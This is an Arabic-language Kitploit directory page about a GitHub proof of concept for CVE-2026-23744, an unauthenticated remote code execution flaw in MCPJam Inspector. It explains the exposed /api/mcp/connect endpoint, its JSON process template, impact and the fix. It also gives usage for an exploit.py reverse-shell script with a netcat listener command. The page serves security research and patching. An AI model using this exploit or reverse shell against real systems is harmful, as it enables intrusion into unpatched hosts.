Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2026-23744 | Kitploit
أدوات/GitHubGitHub/rohit-sundar/cve-2026-23744
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمأداة الوصول عن بعدمختبرات وتدريب عملي
GitHubrohit-sundar/cve-2026-23744

cve-2026-23744

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23744 – MCPJam Inspector تنفيذ تعليمات برمجية عن بُعد دون مصادقة (RCE)

الوصف

  • المنتج: MCPJam Inspector
  • الإصدارات المتأثرة: ≤ 1.4.2
  • الإصدار المُصحَّح: 1.4.3
  • النوع: تنفيذ تعليمات برمجية عن بُعد دون مصادقة (RCE)
  • ناقل الهجوم: الشبكة
  • المصادقة المطلوبة: لا
  • تفاعل المستخدم المطلوب: لا
  • CVSS v3.1: 9.8 (حرجة)

CVE-2026-23744 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة دون مصادقة تؤثر على MCPJam Inspector ≤ 1.4.2. تنشأ المشكلة لأن Inspector يعرّض نقطة نهاية إدارية (/api/mcp/connect) تقبل إعدادات خادم MCP يتحكم فيها المستخدم ويمكن أن تؤدي إلى تنفيذ عمليات دون مصادقة كافية أو قيود أمنية. تستمع الإصدارات المتأثرة على 0.0.0.0 (جميع الواجهات) افتراضيًا بدلاً من localhost، مما يجعل الاستغلال عن بُعد ممكنًا إذا كانت الخدمة قابلة للوصول عبر الشبكة.

التفاصيل الفنية

ترتبط الثغرة بنقطة النهاية التالية:

root@kitploit:~
POST /api/mcp/connect

تقبل نقطة النهاية كائن JSON يحتوي على إعدادات خادم، مثل:

root@kitploit:~
{
  "serverConfig": {
    "command": "<executable>",
    "args": ["<arguments>"],
    "env": {}
  },
  "serverId": "<identifier>"
}

يُستخدم هذا الإعداد المُقدَّم بعد ذلك بواسطة MCPJam Inspector لإنشاء وإدارة عملية خادم MCP جديدة. وبما أن نقطة النهاية تفتقر إلى مصادقة كافية وضوابط أمنية، يمكن للمهاجم إرسال تعريفات عمليات عشوائية يتم تنفيذها بواسطة خدمة Inspector.

في جوهرها، تعد هذه الثغرة مشكلة غياب المصادقة للوظائف الحرجة (CWE-306) حيث يعرّض التطبيق وظائف مخصصة للمستخدمين المحليين الموثوقين ويجعلها قابلة للوصول عبر الشبكة دون فحوصات أمنية كافية.

السبب الجذري

تنشأ الثغرة من عيبين في التصميم:

  1. وصول غير مصادَق عليه لإدارة العمليات
  • تسمح واجهة API للمستخدمين بتحديد كيفية تشغيل خوادم MCP.
  • الوظائف الحرجة قابلة للوصول دون مصادقة.
  • يثق التطبيق في معاملات العمليات التي يتحكم فيها المستخدم دون أي تحقق إضافي.
  1. تعرض افتراضي غير آمن
  • يستمع MCPJam Inspector على 0.0.0.0 افتراضيًا.
  • واجهة API الإدارية قابلة للوصول من أنظمة أخرى على الشبكة.
  • يمكن للمهاجمين التفاعل عن بُعد مباشرة مع وظيفة إنشاء العمليات.

يمكن تصور مسار الهجوم الناتج على النحو التالي:

root@kitploit:~
Attacker → /api/mcp/connect → Process Creation → Operating System

نظرًا لأن التطبيق يتفاعل مباشرة مع إنشاء عمليات نظام التشغيل، فإن الاستغلال الناجح يمكن أن يؤدي إلى تنفيذ أوامر عشوائية ضمن السياق الأمني لخدمة MCPJam Inspector.

الاستخدام

root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
  • -t (أو) --target: عنوان URL الهدف أو عنوان IP الهدف.
  • -tport (أو) --target-port: منفذ الهدف للاتصال به، وهو في معظم الحالات 6274 لـ MCPJam Inspector. لا تستخدم هذه الوسيطة إذا كان MCPJam Inspector مستضافًا في مكان آخر، مثل نطاق فرعي أو مضيف افتراضي. استخدم بدلاً من ذلك الوسيطة -t لتحديد النطاق الفرعي أو المضيف الافتراضي.
  • -lhost (أو) --local-host: عنوان IP العام للصدفة العكسية للاتصال به.
  • -lport (أو) --local-port: المنفذ الذي سيُستخدم للصدفة العكسية.
root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
  • -c (أو) --command: الأمر المراد تنفيذه على الهدف.

قبل استخدام هذا البرنامج، يجب أولاً تشغيل مستمع على جهازك المحلي باستخدام Netcat.

للقيام بذلك، استخدم الأمر التالي:

root@kitploit:~
nc -lvnp <port>

ثم قم بتشغيل الأمر أعلاه للحصول على صدفة عكسية على الهدف.

الأثر

قد يسمح الاستغلال الناجح للمهاجم بما يلي:

  • تنفيذ أوامر عشوائية على المضيف الهدف،
  • قراءة أو تعديل الملفات الحساسة،
  • تثبيت آليات استمرارية،
  • نشر برمجيات خبيثة أو أدوات إضافية،
  • التنقل إلى أنظمة أخرى داخل البيئة،
  • احتمالية تحقيق اختراق كامل للنظام اعتمادًا على صلاحيات الخدمة.

حصلت الثغرة على درجة CVSS v3.1 تبلغ 9.8 (حرجة) نظرًا لناقل الهجوم الشبكي، وغياب المصادقة، وعدم الحاجة لتفاعل المستخدم، والأثر الكبير على السرية والنزاهة والتوافر.

التخفيف

قم بالترقية فورًا إلى MCPJam Inspector 1.4.3 أو أحدث. تشمل الإجراءات الدفاعية الإضافية ما يلي:

  • تقييد الوصول إلى واجهة Inspector،
  • ربط الخدمات بـ localhost حيثما أمكن،
  • الحد من التعرض من خلال قواعد جدار الحماية،
  • تشغيل الخدمة بأقل صلاحيات مطلوبة،
  • مراقبة محاولات الوصول غير المصرح بها.

إخلاء المسؤولية

هذا الاستغلال (PoC) لأغراض تعليمية وبحوث الأمن الدفاعي والاختبارات الأمنية المصرح بها فقط. يجب استخدامه فقط ضد الأنظمة التي لديك إذن صريح لاختبارها. قد يؤدي الاستخدام غير المصرح به ضد أنظمة طرف ثالث إلى انتهاك القوانين واللوائح المعمول بها. ليس مالك هذا المستودع مسؤولاً عن أي أضرار ناتجة عن استخدام هذا البرنامج.

المصادر

  1. سجل CVE في MITRE – CVE-2026-23744
  2. قاعدة بيانات الثغرات الوطنية (NVD) في NIST – CVE-2026-23744
  3. استشارة أمان GitHub (GHSA-232v-j27c-5pp6)
  4. CVE-2026-23744 – البحث عن الثغرات
  5. CVE-2026-23744: ثغرة RCE حرجة في MCPJam Inspector تستهدف المطورين – CrowdSec
  6. CVE-2026-23744: ثغرة RCE في MCPJam Inspector – SentinelOne
تنزيل الأداة